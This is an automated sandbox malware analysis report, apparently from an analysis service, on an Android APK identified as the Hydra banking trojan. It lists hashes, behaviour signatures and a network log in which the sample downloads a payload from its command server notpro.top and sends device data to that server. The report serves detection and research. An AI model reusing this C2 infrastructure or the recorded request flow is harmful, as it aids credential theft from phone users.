Analysis

  • max time kernel
    2817949s
  • max time network
    142s
  • platform
    android_x86
  • resource
    android-x86-arm-20220621-en
  • resource tags
    android, arch:arm, arch:x86, image:android-x86-arm-20220621-en, locale:en-us, os:android-9-x86, system
  • submitted
    16/08/2022, 18:36 UTC

General

  • Target

    9c96b8f5b7599b8f447d56c5e51b3e65.apk

  • Size

    2.7MB

  • MD5

    9c96b8f5b7599b8f447d56c5e51b3e65

  • SHA1

    9ea098c58e0054c4977e164c62ef9a5218fa2e1c

  • SHA256

    c87b73a7595006407d2eb454912707fa9ca4ca700a1afbea7657f7dc5f7899c6

  • SHA512

    6ffad1c6253f3bbd95a2e51dbac021f5fc4033d505685747d5836d970616fcf96601a3c59597ea4f87100293bbc6c53e3704a7f9b28da33775edf753beb6ce96

Malware Config

Extracted

Family

hydra

C2

https://notpro.top

Signatures

  • Hydra

    Android banker and info stealer.

  • Hydra payload (2 IoCs)
  • Makes use of the framework's Accessibility service. (2 IoCs)
  • Loads dropped Dex/Jar (2 IoCs)

    Runs executable file dropped to the device during analysis.

  • Looks up external IP address via web service (2 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Reads information about phone network operator.

Processes

  • com.lawsuit.today
    1⤵
    • Makes use of the framework's Accessibility service.
    • Loads dropped Dex/Jar
    PID:4695
    • /system/bin/dex2oat --instruction-set=x86 --instruction-set-features=ssse3,-sse4.1,-sse4.2,-avx,-avx2,-popcnt --runtime-arg -Xhidden-api-checks --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --inline-max-code-units=0 --compact-dex-level=none --dex-file=/data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json --output-vdex-fd=41 --oat-fd=42 --oat-location=/data/user/0/com.lawsuit.today/app_DynamicOptDex/oat/x86/wdebM.odex --compiler-filter=quicken --class-loader-context=&
      2⤵
      • Loads dropped Dex/Jar
      PID:4753

Network

  • flag-us
    DNS
    semanticlocation-pa.googleapis.com
    Remote address:
    1.1.1.1:53
    Request
    semanticlocation-pa.googleapis.com
    IN A
    Response
    semanticlocation-pa.googleapis.com
    IN A
    216.58.208.106
  • flag-us
    DNS
    notpro.top
    Remote address:
    1.1.1.1:53
    Request
    notpro.top
    IN A
    Response
    notpro.top
    IN A
    185.225.73.4
  • flag-nl
    GET
    https://notpro.top/payload
    Remote address:
    185.225.73.4:443
    Request
    GET /payload HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:49 GMT
    Content-Type: application/octet-stream
    Content-Length: 997816
    Connection: keep-alive
    Last-Modified: Fri, 27 May 2022 19:07:18 GMT
    ETag: "62912166-f39b8"
    Accept-Ranges: bytes
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/update
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/update HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 31
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:55 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:49 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
  • flag-nl
    GET
    https://notpro.top/api/mirrors
    Remote address:
    185.225.73.4:443
    Request
    GET /api/mirrors HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
    Content-Encoding: gzip
  • flag-nl
    POST
    https://notpro.top/api/v1/device/lock
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/lock HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 18
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/storage/zip/TM521X6rBCNCY1YiGIJHoc63sciAe8qn1ARJ0z8p.zip
    Remote address:
    185.225.73.4:443
    Request
    GET /storage/zip/TM521X6rBCNCY1YiGIJHoc63sciAe8qn1ARJ0z8p.zip HTTP/1.1
    Range: bytes=0-
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 206 Partial Content
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:50 GMT
    Content-Type: application/zip
    Content-Length: 70907101
    Connection: keep-alive
    Last-Modified: Fri, 15 Jul 2022 17:46:01 GMT
    ETag: "62d1a7d9-439f4dd"
    Content-Range: bytes 0-70907100/70907101
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:09 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 137
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 3389
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    216.58.208.110
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/json
    Remote address:
    208.95.112.1:80
    Request
    GET /json HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: ip-api.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Tue, 16 Aug 2022 18:40:10 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 302
    Access-Control-Allow-Origin: *
    X-Ttl: 54
    X-Rl: 43
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:15 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:16 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:55 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • 142.250.179.195:443
    52 B
    40 B
    1
    1
  • 142.250.179.142:443
    tls, https
    803 B
    40 B
    1
    1
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    9.6kB
    1.0MB
    144
    232

    HTTP Request

    GET https://notpro.top/payload

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/update

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/check?screen=true
    tls, http
    1.6kB
    16.4kB
    15
    15

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    491.4kB
    72.1MB
    8990
    14113

    HTTP Request

    GET https://notpro.top/api/mirrors

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/lock

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/storage/zip/TM521X6rBCNCY1YiGIJHoc63sciAe8qn1ARJ0z8p.zip

    HTTP Response

    206

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 216.58.208.110:443
    android.apis.google.com
    tls
    4.4kB
    9.4kB
    13
    19
  • 208.95.112.1:80
    http://ip-api.com/json
    http
    451 B
    651 B
    5
    4

    HTTP Request

    GET http://ip-api.com/json

    HTTP Response

    200
  • 1.1.1.1:853
    tls
    776 B
    3.5kB
    10
    9
  • 1.1.1.1:853
    tls
    810 B
    4.0kB
    9
    10
  • 1.1.1.1:853
    tls
    1.2kB
    1.1kB
    10
    10
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    2.0kB
    15.5kB
    15
    15

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    1.8kB
    15.3kB
    11
    11

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    1.9kB
    15.3kB
    12
    12

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 1.1.1.1:53
    semanticlocation-pa.googleapis.com
    dns
    80 B
    96 B
    1
    1

    DNS Request

    semanticlocation-pa.googleapis.com

    DNS Response

    216.58.208.106

  • 1.1.1.1:53
    notpro.top
    dns
    56 B
    72 B
    1
    1

    DNS Request

    notpro.top

    DNS Response

    185.225.73.4

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
    109 B
    1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    216.58.208.110

  • 1.1.1.1:53
    ip-api.com
    dns
    112 B
    2

    DNS Request

    ip-api.com

    DNS Request

    ip-api.com

  • 1.1.1.1:53
    ip-api.com
    dns
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

Downloads

  • /data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json

    Filesize

    1.3MB

    MD5

    5ebe4e294ee14d00e628510874fa1e7f

    SHA1

    cb158896516628256976957a3d252bcf6f401ad9

    SHA256

    b335647aad2246da6b67f7727d97562838a032e198271e5700651c51b9bf1b7b

    SHA512

    188238c09526b1680e375be98304b36c2f6595f8366e32b4a1a712d40f94ef270208dd84a903994f4e57bb5fa33b00114eb2ff3c72c36be0d95a54affecdd13b

  • /data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json

    Filesize

    3.6MB

    MD5

    81da1d044c8d0f6158041b373b42d8cd

    SHA1

    282b8d8eba1e63d25812d6e8b99ee39b19b3444c

    SHA256

    ce8b4453c6b727780c94ebd80f90b264d819f9172f0d49c0e229a1a9f41f926e

    SHA512

    f3cd99c8824fd5f62e351bafd4fcb034d12645767bf917ba20f8858d70c75ff40fcde61b84b019a3cff829086f47aef4f2acb4c11031b6e2416100f0c901fba6

  • /data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json

    Filesize

    3.6MB

    MD5

    bfe4abdeb63bb7ca930679be5087df29

    SHA1

    828f80c25ab12ca251642439f690aec0aad6ecc9

    SHA256

    76112405f0249e3f37b36efe9d5d20fa2b40c2fb2ba5b592e9b86d9b5dabe5f4

    SHA512

    3582139e763ea6a32ae05d30dc1e1dabd25d529aa38921306fe3fa0044a5a177e8480bfc43167fb17ca5c3a83c22fd74bb5bd6cdfe26aa2857aa8ef8eb0734a6

  • /data/user/0/com.lawsuit.today/app_apk/payload.apk

    Filesize

    974KB

    MD5

    3baeaa766ea7f31a9147208efd957c75

    SHA1

    c701de3d0e55425394ccbf8e0967639e86f3c54e

    SHA256

    75e162dc291e15d13b0f3202a66e0c88ff2db09ec02922ee64818dbddcb78d6d

    SHA512

    9f3ccb1fc9a177524ba2d39f809be4851af385073463893bd4a8664308253fc0da2b9ab330c85675dbe9ce0c44b631a0d1ec7800491687c7b2540504b351295f
